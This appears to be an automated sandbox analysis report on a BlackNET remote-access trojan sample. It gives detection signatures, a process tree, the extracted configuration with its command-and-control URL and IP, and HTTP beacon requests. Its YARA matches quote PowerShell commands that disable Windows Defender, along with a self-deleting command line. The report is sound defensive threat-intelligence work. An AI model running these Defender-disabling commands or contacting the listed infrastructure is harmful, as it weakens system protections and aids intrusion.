Edit tour

Windows Analysis Report
HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

Overview

General Information

Sample Name:	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe
Analysis ID:	889805
MD5:	d677c626953c9ba17b3d094a83b1048e
SHA1:	bf78af289038b4c088b7679a3d08627dac4883bd
SHA256:	4d178e10389731a660d8dc1240f6d64723aae55ad953150bed2520d2c39e6644
Tags:	BlackNETexe
Infos:

Detection

BlackNET

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected BlackNET

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Found strings related to Crypto-Mining

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Yara detected Generic Downloader

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Creates autostart registry keys with suspicious names

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Drops PE files to the application program directory (C:\ProgramData)

One or more processes crash

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Dropped file seen in connection with other malware

Creates a process in suspended mode (likely to inject code)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

Process Tree

System is w10x64

HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe (PID: 4196 cmdline: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe MD5: D677C626953C9BA17B3D094A83B1048E)

powershell.exe (PID: 6928 cmdline: "powershell" Get-MpPreference -verbose MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

defenderr.exe (PID: 6640 cmdline: "C:\ProgramData\Microsoft\MyClient\defenderr.exe" MD5: D677C626953C9BA17B3D094A83B1048E)

WerFault.exe (PID: 6844 cmdline: C:\Windows\system32\WerFault.exe -u -p 4196 -s 3296 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)

HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe (PID: 496 cmdline: "C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe" MD5: D677C626953C9BA17B3D094A83B1048E)

HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe (PID: 6648 cmdline: "C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe" MD5: D677C626953C9BA17B3D094A83B1048E)

defenderr.exe (PID: 2080 cmdline: "C:\ProgramData\Microsoft\MyClient\defenderr.exe" MD5: D677C626953C9BA17B3D094A83B1048E)

WerFault.exe (PID: 3156 cmdline: C:\Windows\system32\WerFault.exe -u -p 6648 -s 7384 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
BlackNET RAT	Advanced and modern Windows botnet with PHP panel developed using VB.NET. It has a lot of functionalities including: stealing/grabbing files and passwords, keylogging, cryptojacking, loading files, executing commands, etc. It is open source and emerged at the end of 2019.	No Attribution	http://www.pwncode.io/2019/12/blacknet-rat-when-you-leave-panel.html https://blog.malwarebytes.com/threat-analysis/2020/03/fake-corona-antivirus-distributes-blacknet-remote-administration-tool/ https://blog.minerva-labs.com/become-a-vip-victim-with-new-discord-distributed-malware https://github.com/BlackHacker511/BlackNET/ https://github.com/FarisCode511/BlackNET/	https://malpedia.caad.fkie.fraunhofer.de/details/win.blacknet_rat

Malware Configuration

Threatname: BlackNET

{"Host": "http://f0575824.xsph.ru/blacknet", "ID": "HacKed", "Starup Name": "True", "Install Name": "defenderr.exe", "Install Dir": "ProgramData", "Delay": "1000", "Version": "v3.7.0 Public", "Network Seprator": "|BN|", "Mutex": "BN[9a7c9bd0f370a68cb4ac77fcfeb884bd]"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.425501198.0000000002DA0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_BlackNET	Yara detected BlackNET	Joe Security
00000005.00000002.425501198.0000000002DA0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000005.00000002.425501198.0000000002DA0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x14654:$reg1: SOFTWARE\Microsoft\Windows Defender\Features 0x146d4:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x14759:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x14bbe:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true 0x14c76:$s2: Set-MpPreference -DisableArchiveScanning $true 0x14d16:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true 0x14db4:$s4: Set-MpPreference -DisableScriptScanning $true 0x14e3e:$s5: Set-MpPreference -SubmitSamplesConsent 2 0x14eac:$s6: Set-MpPreference -MAPSReporting 0 0x14f24:$s7: Set-MpPreference -HighThreatDefaultAction 6 0x14fc2:$s8: Set-MpPreference -ModerateThreatDefaultAction 6 0x15050:$s9: Set-MpPreference -LowThreatDefaultAction 6 0x150da:$s10: Set-MpPreference -SevereThreatDefaultAction 6
00000005.00000002.425501198.0000000002DA0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_BlackNET	Detects BlackNET RAT	ditekSHen	0x140d6:$s1: SbieCtrl 0x140e8:$s2: SpyTheSpy 0x15668:$s4: StartDDOS 0x1567c:$s5: UDPAttack 0x15724:$s6: ARMEAttack 0x15762:$s7: TCPAttack 0x1579c:$s8: HTTPGetAttack 0x16360:$s9: RetriveLogs 0x163b6:$s10: StealPassword 0x17dee:$cnc2: /upload.php?id=
Process Memory Space: defenderr.exe PID: 6640	JoeSecurity_BlackNET	Yara detected BlackNET	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.defenderr.exe.2da0000.2.raw.unpack	JoeSecurity_BlackNET	Yara detected BlackNET	Joe Security
5.2.defenderr.exe.2da0000.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
5.2.defenderr.exe.2da0000.2.raw.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x14654:$reg1: SOFTWARE\Microsoft\Windows Defender\Features 0x146d4:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x14759:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x14bbe:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true 0x14c76:$s2: Set-MpPreference -DisableArchiveScanning $true 0x14d16:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true 0x14db4:$s4: Set-MpPreference -DisableScriptScanning $true 0x14e3e:$s5: Set-MpPreference -SubmitSamplesConsent 2 0x14eac:$s6: Set-MpPreference -MAPSReporting 0 0x14f24:$s7: Set-MpPreference -HighThreatDefaultAction 6 0x14fc2:$s8: Set-MpPreference -ModerateThreatDefaultAction 6 0x15050:$s9: Set-MpPreference -LowThreatDefaultAction 6 0x150da:$s10: Set-MpPreference -SevereThreatDefaultAction 6
5.2.defenderr.exe.2da0000.2.raw.unpack	MALWARE_Win_BlackNET	Detects BlackNET RAT	ditekSHen	0x140d6:$s1: SbieCtrl 0x140e8:$s2: SpyTheSpy 0x15668:$s4: StartDDOS 0x1567c:$s5: UDPAttack 0x15724:$s6: ARMEAttack 0x15762:$s7: TCPAttack 0x1579c:$s8: HTTPGetAttack 0x16360:$s9: RetriveLogs 0x163b6:$s10: StealPassword 0x17dee:$cnc2: /upload.php?id=
5.2.defenderr.exe.2daa254.1.raw.unpack	JoeSecurity_BlackNET	Yara detected BlackNET	Joe Security
5.2.defenderr.exe.2daa254.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
5.2.defenderr.exe.2daa254.1.raw.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0xa400:$reg1: SOFTWARE\Microsoft\Windows Defender\Features 0xa480:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0xa505:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0xa96a:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true 0xaa22:$s2: Set-MpPreference -DisableArchiveScanning $true 0xaac2:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true 0xab60:$s4: Set-MpPreference -DisableScriptScanning $true 0xabea:$s5: Set-MpPreference -SubmitSamplesConsent 2 0xac58:$s6: Set-MpPreference -MAPSReporting 0 0xacd0:$s7: Set-MpPreference -HighThreatDefaultAction 6 0xad6e:$s8: Set-MpPreference -ModerateThreatDefaultAction 6 0xadfc:$s9: Set-MpPreference -LowThreatDefaultAction 6 0xae86:$s10: Set-MpPreference -SevereThreatDefaultAction 6
5.2.defenderr.exe.2daa254.1.raw.unpack	MALWARE_Win_BlackNET	Detects BlackNET RAT	ditekSHen	0x9e82:$s1: SbieCtrl 0x9e94:$s2: SpyTheSpy 0xb414:$s4: StartDDOS 0xb428:$s5: UDPAttack 0xb4d0:$s6: ARMEAttack 0xb50e:$s7: TCPAttack 0xb548:$s8: HTTPGetAttack 0xc10c:$s9: RetriveLogs 0xc162:$s10: StealPassword 0xdb9a:$cnc2: /upload.php?id=
5.2.defenderr.exe.2daa254.1.raw.unpack	CN_disclosed_20180208_c	Detects malware from disclosed CN malware set	Florian Roth	0xa3be:$x1: cmd.exe /c ping 0 -n 2 & del " 0xc402:$s7: shutdown -r -t 00
5.2.defenderr.exe.2da0000.2.unpack	JoeSecurity_BlackNET	Yara detected BlackNET	Joe Security
5.2.defenderr.exe.2da0000.2.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x12854:$reg1: SOFTWARE\Microsoft\Windows Defender\Features 0x128d4:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x12959:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x12dbe:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true 0x12e76:$s2: Set-MpPreference -DisableArchiveScanning $true 0x12f16:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true 0x12fb4:$s4: Set-MpPreference -DisableScriptScanning $true 0x1303e:$s5: Set-MpPreference -SubmitSamplesConsent 2 0x130ac:$s6: Set-MpPreference -MAPSReporting 0 0x13124:$s7: Set-MpPreference -HighThreatDefaultAction 6 0x131c2:$s8: Set-MpPreference -ModerateThreatDefaultAction 6 0x13250:$s9: Set-MpPreference -LowThreatDefaultAction 6 0x132da:$s10: Set-MpPreference -SevereThreatDefaultAction 6
5.2.defenderr.exe.2da0000.2.unpack	MALWARE_Win_BlackNET	Detects BlackNET RAT	ditekSHen	0x122d6:$s1: SbieCtrl 0x122e8:$s2: SpyTheSpy 0x13868:$s4: StartDDOS 0x1387c:$s5: UDPAttack 0x13924:$s6: ARMEAttack 0x13962:$s7: TCPAttack 0x1399c:$s8: HTTPGetAttack 0x14560:$s9: RetriveLogs 0x145b6:$s10: StealPassword 0x15fee:$cnc2: /upload.php?id=
Click to see the 7 entries

Snort Signatures

ET TROJAN Win32/BlackNET CnC Keep-Alive - Source IP: 192.168.2.3 - Destination IP: 141.8.197.42

Timestamp:	192.168.2.3141.8.197.4249705802029179 06/18/23-09:33:20.041349
SID:	2029179
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/BlackNET CnC Keep-Alive - Source IP: 192.168.2.3 - Destination IP: 141.8.197.42

Timestamp:	192.168.2.3141.8.197.4249715802029179 06/18/23-09:34:06.047506
SID:	2029179
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 5.2.defenderr.exe.2da0000.2.raw.unpack

Malware Configuration Extractor: BlackNET {"Host": "http://f0575824.xsph.ru/blacknet", "ID": "HacKed", "Starup Name": "True", "Install Name": "defenderr.exe", "Install Dir": "ProgramData", "Delay": "1000", "Version": "v3.7.0 Public", "Network Seprator": "|BN|", "Mutex": "BN[9a7c9bd0f370a68cb4ac77fcfeb884bd]"}

Multi AV Scanner detection for submitted file

Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	ReversingLabs: Detection: 48%
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Virustotal: Detection: 52%			Perma Link

Antivirus / Scanner detection for submitted sample

Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe

Avira: detection malicious, Label: HEUR/AGEN.1352438

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	ReversingLabs: Detection: 48%
Source: C:\Users\user\Desktop\svchosts.exe	ReversingLabs: Detection: 72%

Machine Learning detection for sample

Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe

Joe Sandbox ML: detected

Bitcoin Miner

Found strings related to Crypto-Mining

Source: defenderr.exe, 00000005.00000002.425501198.0000000002DA0000.00000004.08000000.00040000.00000000.sdmp

String found in binary or memory: XMRMiner

Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Core.ni.pdbRSDSD source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Xml.ni.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS5 source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.ni.pdbRSDS source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: embly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbg source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.521974726.00000000010F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Runtime.Remoting.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Configuration.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: C:\Users\mrxsh\BlackNET\WatcherService\WatcherService\obj\Release\svchost.pdb source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.431182009.0000000002E25000.00000004.00000800.00020000.00000000.sdmp, defenderr.exe, 00000005.00000002.425501198.0000000002DA0000.00000004.08000000.00040000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.528752974.0000000003019000.00000004.00000800.00020000.00000000.sdmp, svchosts.exe.0.dr
Source:	Binary string: lib.pdb.0W source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.558054025.000000001F478000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Runtime.Remoting.pdbMZ@ source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Runtime.Remoting.ni.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: 0C:\Windows\mscorlib.pdb source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.467426221.000000001F9F8000.00000004.00000010.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.558054025.000000001F478000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Core.ni.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.558054025.000000001F478000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: mscorlib.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: symbols\dll\mscorlib.pdbpdb0 source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.467426221.000000001F9F8000.00000004.00000010.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.558054025.000000001F478000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb@ source: WER9246.tmp.dmp.6.dr
Source:	Binary string: System.Drawing.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Management.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: mscorlib.ni.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Management.ni.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Core.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Runtime.Remoting.ni.pdbRSDSB source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Configuration.ni.pdbRSDSO* source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: lib.pdb.0 source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.467426221.000000001F9F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS] source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb`g source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.467426221.000000001F9F8000.00000004.00000010.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.558054025.000000001F478000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbM source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.454682511.000000001B4F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Xml.pdb@ source: WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.ni.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2029179 ET TROJAN Win32/BlackNET CnC Keep-Alive 192.168.2.3:49705 -> 141.8.197.42:80
Source: Traffic	Snort IDS: 2029179 ET TROJAN Win32/BlackNET CnC Keep-Alive 192.168.2.3:49715 -> 141.8.197.42:80

Yara detected Generic Downloader

Source: Yara match	File source: 5.2.defenderr.exe.2da0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.defenderr.exe.2daa254.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.425501198.0000000002DA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://f0575824.xsph.ru/blacknet

Source: global traffic	HTTP traffic detected: GET /blacknet HTTP/1.1Host: f0575824.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /blacknet HTTP/1.1Host: f0575824.xsph.ruConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 141.8.197.42 141.8.197.42
Source: Joe Sandbox View	IP Address: 141.8.197.42 141.8.197.42

Source: global traffic	HTTP traffic detected: GET /blacknet/receive.php?command=VW5pbnN0YWxs&vicID=SGFjS2VkXzdGOTRDM0I1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: f0575824.xsph.ru
Source: global traffic	HTTP traffic detected: GET /blacknet/receive.php?command=VW5pbnN0YWxs&vicID=SGFjS2VkXzdGOTRDM0I1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: f0575824.xsph.ru

Source: powershell.exe, 00000001.00000002.498058692.00000150483AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.376426675.000000001BCA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://en.wb84ti
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.431182009.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.528752974.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f0575824.xsph.ru
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.431182009.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.528752974.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f0575824.xsph.ru/blacknet
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: powershell.exe, 00000001.00000002.489596253.0000015040010000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.421041056.00000150301A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.421041056.00000150301A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.431182009.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.421041056.000001502FFA1000.00000004.00000800.00020000.00000000.sdmp, defenderr.exe, 00000005.00000002.425763235.0000000002E6D000.00000004.00000800.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000A.00000002.478081325.0000000002C0D000.00000004.00000800.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.528752974.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, defenderr.exe, 0000000D.00000002.560257474.000000000289D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.421041056.00000150301A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000001.00000002.421041056.00000150301A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.379438232.000000001BCD7000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.379485933.000000001BCD7000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.379515632.000000001BCD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.379438232.000000001BCD7000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.379485933.000000001BCD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html-si
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
